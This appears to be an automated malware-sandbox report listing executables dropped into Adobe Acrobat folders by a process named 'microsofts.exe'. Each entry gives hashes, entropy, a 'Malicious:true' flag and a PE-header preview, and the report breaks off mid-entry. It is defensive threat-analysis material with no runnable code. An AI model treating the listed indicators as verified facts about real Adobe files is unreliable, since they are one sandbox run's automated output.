                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................v......................................a..X.....X........r....X.....Rich...........PE..d......c.........."............................@.......................................... .................................................. ...........v..............................p.......................(....................0...............................text............................... ..`.rdata..Z$...0...&..................@..@.data...x"...`.......@..............@....pdata...............L..............@..@.rsrc....v.......v...j..............@..@.reloc...P...0...@..................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1253376
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.157390392810802
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:PWBWUXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:PWBWUsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:2AD22D67EB79D94A78AF5DA3A1F24257
                                                                                                                                                                                                                                                                                                          SHA1:5AECA85D0F7184485A1FDC93C4B53861B77AB062
                                                                                                                                                                                                                                                                                                          SHA-256:37FC0374F99511932DB9F63A007B7EEFC1337E03EC47A9DB330CD773205BB0F3
                                                                                                                                                                                                                                                                                                          SHA-512:A7DB42AAD5250E2D0A105711E08297690B3B9C724FDD55AFA4C26A281D82889830C2CDC410E4F04D708BF9FDDF627F6695DCA10F9015DA99D043F44F17A8E883
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1.v.Pc%.Pc%.Pc%.(.%.Pc%C$g$.Pc%C$`$.Pc%C$f$.Pc%C$b$.Pc%.;g$.Pc%.;b$.Pc%.Pb%EPc%z$f$.Pc%z$.%.Pc%.P.%.Pc%z$a$.Pc%Rich.Pc%................PE..d...DC,d.........."............................@.............................`......"&.... .................................................h...@.......@............................Q..T....................S..(... R..8............0...............................text............................... ..`.rdata..$....0......................@..@.data...............................@....pdata..............................@..@.rsrc...@...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1683968
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.228477153490509
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:if9AiKGpEoQpkN2C4McuKo0GTNtpyT5RGeQa0nsqjnhMgeiCl7G0nehbGZpbD:i+GtCi27mVTyT+a07Dmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:F50FEED36ABFE427C7AB87B4658EA688
                                                                                                                                                                                                                                                                                                          SHA1:31A73260393F5BF92DA793373BAC5CDE07FDB91D
                                                                                                                                                                                                                                                                                                          SHA-256:31DFA77C16CE582D33C561098360277A8F89CEBE19F94ABEFC11EFF399A714F1
                                                                                                                                                                                                                                                                                                          SHA-512:5536B84850949830C7D52A85932A75BBAAAE654A2ECBA45E7AEFC1C11CE313CD1D8A9050780374AF6FEBB599699B5545CE26BD5E4D9C4D3286C3DFD9FEE27E93
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........ ..N...N...N......N.e.K...N...O...N...J...N...M...N...H...N...K...N...#...N.<~3...N..C3...N...O...N...O.O.N...F...N.......N......N...L...N.Rich..N.................PE..d...%..c.........."......j...t......@..........@.......................................... .................................................x........... ....p..dt......................p.......................(... ...8............................................text...kh.......j.................. ..`.rdata...............n..............@..@.data...`S.......F..................@....pdata..dt...p...v...D..............@..@.rsrc... ...........................@..@.reloc..............................@...........................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):3110912
                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.649646544947405
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:49152:NU198PzqkltcT0gViJNfBZQiOIK5Ns6YZ82PTJeYkDmg27RnWGj:i2NfHOIK5Ns6qR96D527BWG
                                                                                                                                                                                                                                                                                                          MD5:FC5A0E95874B3812637A0DCEFD695C02
                                                                                                                                                                                                                                                                                                          SHA1:F8D5F98BA4DADC6F205A99E59D91594F3F686061
                                                                                                                                                                                                                                                                                                          SHA-256:A96AB7DCC306B4296CE06F14590008CED2674720EBB343DC7405117BE6A20AC7
                                                                                                                                                                                                                                                                                                          SHA-512:883CCC86CA76E9CF3C9F192D4C7E12BCBF977442AA76DB46BEA73F28F124F95762160425418604F1C8F84948112B6D2E3CEFCF2B3FB8977C0F21F911FAB1FE6A
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......'A3rc ]!c ]!c ]!..!h ]!..!. ]!..!x ]!1UY r ]!1U^ i ]!.O.!a ]!..!g ]!..!b ]!1UX . ]!..!@ ]!.UX . ]!c \!.!]!.UT . ]!.U.!b ]!c .!b ]!.U_ b ]!Richc ]!................PE..d.....Zd..........".................t..........@..............................0......./... ..................................................o .......&......$.`....................x..p....................y..(....)..8....................j .@....................text............................... ..`.rdata..8...........................@..@.data....q.... ..<...r .............@....pdata..`.....$.......#.............@..@_RDATA........&.......%.............@..@.rsrc........&.......%.............@..@.reloc...@....&..0...H&.............@...................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1588224
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.531902487947546
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:PkcWTUQcydQsqjnhMgeiCl7G0nehbGZpbD:PhKUzDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:DAB74EF8F8221BC0791E0BA91A7C8B06
                                                                                                                                                                                                                                                                                                          SHA1:63562A4D4C55AB05CAF2AFDDDAD1AC93444663D5
                                                                                                                                                                                                                                                                                                          SHA-256:8A20F3DF409ECA1717B880CB49AC2379CB9AE855AA3B85B1D63BDE292CFE7198
                                                                                                                                                                                                                                                                                                          SHA-512:C80CEF9000584DE030737E426B0A902C141CE2E82F6B4CA12F8B7962E85E459FF02AC2E2F4574A1902F4544A80B17CBD493F7FC42C0212CFB6ADDE1878EDCC71
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0I..Q'..Q'..Q'..7#..Q'..7$..Q'..7".!Q'..$#..Q'..$$..Q'..7&..Q'..$"..Q'.x$"..Q'..Q&.dQ'.x$...Q'.x$...Q'..Q...Q'.x$%..Q'.Rich.Q'.........................PE..d.....Zd.........."......,..........(?.........@.......................................... .................................................(...P................m..................tC..p...........................p...8............@..........@....................text....+.......,.................. ..`.rdata......@.......0..............@..@.data....)..........................@....pdata...m.......n..................@..@_RDATA...............B..............@..@.rsrc................D..............@..@.reloc...`...@...P..................@...................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1338368
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.352646938503899
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:ffY+FUBXXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:fA+qBXsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:ED61CB19AF3266874A0D418CCC0C5E89
                                                                                                                                                                                                                                                                                                          SHA1:28F77FD1582FFC772500054D0D16FB1B915724BA
                                                                                                                                                                                                                                                                                                          SHA-256:E800562C8C211BD352DE48DF08A851833308B0DC8BCFB646A85CB01125A8FA48
                                                                                                                                                                                                                                                                                                          SHA-512:99E99553EA8BF371B7F4EB9B2542CCB1AA4AAF960E25F07E8240DBAD78EEC590087E7B1095EA67204D4EBDEE78970B41060F1FCA8F2B52F055982D98CE5C706B
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..*...y...y...y...y...y..x...y..x...y..x...y..x-..y..Ey...yb.x...y...y..yN.x...yN.}y...yN.x...yRich...y........PE..L...<..[................. ...................0....@.................................(...............................................0...............................J..p....................K.......J..@............0...............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data....E.......B..................@....rsrc........0......................@..@.reloc...p...@...`..................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1143296
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.022660438249206
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:kXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:ksqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:79473D5F47129F71430EFC25DD48A2EB
                                                                                                                                                                                                                                                                                                          SHA1:502D7C77D6F436118D28AC8F6648DAA78153737F
                                                                                                                                                                                                                                                                                                          SHA-256:628CF57A056EAD13E4F696DCEF9320EA57F06B54E3087C6E372B941AFB50C129
                                                                                                                                                                                                                                                                                                          SHA-512:BDFFF65632DF33481BFE61E07FB6793A31C71C20BFC5796918628960F3C6AF098E8ED5029652041FB18CF1BE98A384B3CE9DEDC51EC581A27C4BC5A2B7C30E5E
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................+.............................................................G.............Rich............................PE..d...~^.c.........."..........$......p..........@....................................w..... ..................................................;.......p.......`......................d4..p............................4..8............0..0............................text...|........................... ..`.rdata.......0......................@..@.data........P.......,..............@....pdata.......`......................@..@.rsrc........p.......0..............@..@.reloc...P.......@...2..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1161728
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.0471454182145745
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:aDXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:IsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:1B8D37B5883A5045D71522AAC5AE4C16
                                                                                                                                                                                                                                                                                                          SHA1:C7BD31536A6CAEFC73AE8053E961E94D07F67118
                                                                                                                                                                                                                                                                                                          SHA-256:7E2959EB1653C13AE87FD7E1169C71C3A8E092C420C67949020EEA4EF733C2E2
                                                                                                                                                                                                                                                                                                          SHA-512:EB812EB2074591DBE5C815C19C21CE6BCEB59FAAC3D497A37812AD8FA1D4EB92631AA7E5D7EEC411A73C3C4B3AE8B967B3F2ABE521D559E26EB0EEF46694B23D
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2\.v=..v=..v=...E?.x=..I..|=..I..u=..I..j=..I..p=..bV..q=..v=...=..I..t=..IS.w=..v=;.w=..I..w=..Richv=..........................PE..d....^.c.........."......<...B.......>.........@.......................................... ..................................................i..........P.......,...................`X..T............................X..8............P...............................text....;.......<.................. ..`.rdata..$'...P...(...@..............@..@.data................h..............@....pdata..,............l..............@..@.rsrc...P............r..............@..@.reloc...P.......@...z..............@...........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):4151808
                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.499769232365763
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:49152:UtuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755eDmg27RN:UjEIa4HIEWOc5ED527BWG
                                                                                                                                                                                                                                                                                                          MD5:464AEA4F23C07CAD08DE0A7CABEF3B44
                                                                                                                                                                                                                                                                                                          SHA1:BD344FD151B6B9EB7AA6EA2AA6D7A30124DFAF56
                                                                                                                                                                                                                                                                                                          SHA-256:F37193B6876277076DC2B65CC5CDE0E95E3DF9A7C161ED09ED14205C29F7EE8D
                                                                                                                                                                                                                                                                                                          SHA-512:1B5A56006705222021BB8CE65698ECBFA86F8878D24CC876B8D03D58B8F0BC97CC98B04C7E24EBABCC4F9118CE0263E7E85AD2301A8FF1D0F2E11041B1060215
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @.....L6@... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):59941376
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.999367283745036
                                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                                          SSDEEP:1572864:6Qb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:xXhwMhe6AABPiQwF6xQ22R
                                                                                                                                                                                                                                                                                                          MD5:4D49E031F0304B3B417B6FBB8CC2DE1D
                                                                                                                                                                                                                                                                                                          SHA1:C06E95DF29FAB0EBF42FDCCBE19917F120100BEC
                                                                                                                                                                                                                                                                                                          SHA-256:A5C820B526D30EE77CB3B7F0035996A94067EF0F1F75F69B609DE3833A8C977E
                                                                                                                                                                                                                                                                                                          SHA-512:BBA5D4698A127F5D87B9DA27B3D21D9C205A162302949A6886942F871F8071EC139F1C21DC584E8804DD08925A0DC37A97ED5A7F536C5B526D833889319B97AB
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0......"..... .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1230336
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.18558467537154
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:iejVWYUADXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:fjkY7DsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:874F9CD346E1F4A64FB85556E9869D87
                                                                                                                                                                                                                                                                                                          SHA1:C1C2DEF01CE418D44D6E362EDBCC2F245358552F
                                                                                                                                                                                                                                                                                                          SHA-256:D0BE6E3835592520E98DAB4F41DCA48CD3C0DF4477D7E1BFC74D302FB4C1289D
                                                                                                                                                                                                                                                                                                          SHA-512:77638C0D7E865FE767213F124FA224AE9E37D2F2736208AEAD364A7A85373A9E92D5923E5C0C76417E43F503AAFA5D12942D7CE5F17089833527FC94C8155D53
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................b....6......6......6.....6.....................M..4......4......4........f....4.....Rich...........................PE..L.....{d.................&...`...............@....@.................................f{.......................................r..,................................... O..p....................P.......O..@............@..4............................text....%.......&.................. ..`.rdata...@...@...B...*..............@..@.data................l..............@....rsrc................p..............@..@.reloc...`.......P...v..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1384960
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.377794253705876
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:YxwSJhkrmZs/sqjnhMgeiCl7G0nehbGZpbD:Yy+krKsjDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:16A36BB31744ACE606AC51B77D37A1A4
                                                                                                                                                                                                                                                                                                          SHA1:3AF02C248EF9CDEA1D908CF8C260094765DDA90B
                                                                                                                                                                                                                                                                                                          SHA-256:E80C67DB786ED608CF4376D80577D03350BE3F1AB73284C69F25744FC1957777
                                                                                                                                                                                                                                                                                                          SHA-512:CB30E77DB829431F921CFDCA6702D1A333F2D8F9E8086A1F44CD3F5DCCFF677FB10857048553089B528DF9A5E7D157B1FC96E038DF0600F9A6EF6A6975C603C7
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................y...5.......5.....5......7.......................7.....7.Z....2...7.....Rich..........................PE..d.....{d.........."..........<.......&.........@......................................... .................................................`...x.... ..............................`j..p....................l..(....j..8............................................text...l........................... ..`.rdata..............................@..@.data...4#..........................@....pdata........... ..................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc...P...0...@..................@...................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1649152
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.632711566208625
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:5HQJLIRgvsnNOsqjnhMgeiCl7G0nehbGZpbD:5HQJL34iDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:8C4D376220E8F4D14144FE7A6B2B4A57
                                                                                                                                                                                                                                                                                                          SHA1:DC1AF329505001C6603F442B00F36DBB0B5A73A9
                                                                                                                                                                                                                                                                                                          SHA-256:F5C19E4A1F41E7CA65EC28F6A4A6671020C40A9AC11B86B9C2DB4D173826E588
                                                                                                                                                                                                                                                                                                          SHA-512:E41EBB23CC4FC5DDDE8B6351C7110CD0F41F0187C6D55960FE14F584E4BCC509E55C9D1254C517B4A5A9C1731065C60A58442CC04878B5DEE72CF24FB55525E7
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L<."o."o."o...o.."o+.&n.."o+.!n.."o+.#n."o+.'n."o..$n."o..#n.."o).+n.."o.#o;."o).'n."o)..o."o). n."oRich."o........PE..d......d.........."......\.....................@......................................... .................................................."..@....0...........W..................x...T.......................(...`...8............p..........`....................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data....^...P...R...2..............@....pdata...W.......X..................@..@.didat..8...........................@....msvcjmc..... ......................@....rsrc........0......................@..@.reloc...P...@...@..................@...................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):5365760
                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.450965997295338
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:49152:rUZujDjDjDjXmXgoz2PsapFQrC7dRpqbeE8U2IzwDt+bdro4O8b8ITDnlggyJ1kJ:QWmXL6DEC7dRpKuDQbgJD527BWG
                                                                                                                                                                                                                                                                                                          MD5:6D78F95D71614511503126D9ACC93F6D
                                                                                                                                                                                                                                                                                                          SHA1:BE4970F098BB7E84E8349D7EA78332A9A94A1B8F
                                                                                                                                                                                                                                                                                                          SHA-256:451D6CB2FA5B2E6ABA7F051C4348D2A11DCFFBF0512BE5A13F7787BC61C9E808
                                                                                                                                                                                                                                                                                                          SHA-512:EC9547153A2C1A5CB96DDBCCFBF337A537B4815F40D70A4CB416BC8C8E6A99C31FCE4EBFBF39F2F6A6A82E937ECC307180C2C13ED0F0E5EEB1A643E7152EC5B5
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........I.~.(g-.(g-.(g-.Cd,.(g-.Cb,i(g-.G.-.(g-b\c,.(g-b\d,.(g-.t.-.(g-.(g-C(g-b\b,.(g-.Cc,.(g-.Ca,.(g-.Cf,.(g-.(f-.+g-`\b,.(g-`\g,.(g-`\.-.(g-.(.-.(g-`\e,.(g-Rich.(g-........PE..L......d.........."......./..p......P"%.......0...@...........................R.....-.R..............................@:......@:.......;..V...........................^6.T...................._6.....h.5.@.............0...... :.`....................text...*./......./................. ..`.rdata..Ze....0..f....0.............@..@.data....E....:......h:.............@....didat........;......B;.............@....rsrc....V....;..X...H;.............@..@.reloc...P...@G..@....F.............@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):3163136
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.972779926146036
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:98304:0rZ23AbsK6Ro022JjL2WEiVqJZ+D527BWG:eJADmmxL2WEoCZ+VQBWG
                                                                                                                                                                                                                                                                                                          MD5:0CF83F5535AE328C318EC07B717289CB
                                                                                                                                                                                                                                                                                                          SHA1:677C71412B5C165F91577E3C192F27FC56CDD764
                                                                                                                                                                                                                                                                                                          SHA-256:C967E2F191FECF69AC6219B8C53DCA89C851397DDD807C9B4BA60C6FF731E25F
                                                                                                                                                                                                                                                                                                          SHA-512:97FD132162F5177E2D5803872C0382D404573EB8F2ADBDEA828F5B3BC76CE6A673CFBBE89E3C9E30D85C48D6254CB5A202FC6A30B61DE3264EE90E879CC6679C
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5{.!q..rq..rq..rq..r...rQc.r`..rQc.r`..rQc.rp..rQc.rp..rRichq..r........................PE..L.....A.................~... .......^... ........... ........................1.......1.......... .....................................0............................!............................................... ...............................text....|... ...~.................. ..`.data...............................@....rsrc...../......./.................@...................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1213440
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.20487966477891
                                                                                                                                                                                                                                                                                                          Encrypted:false
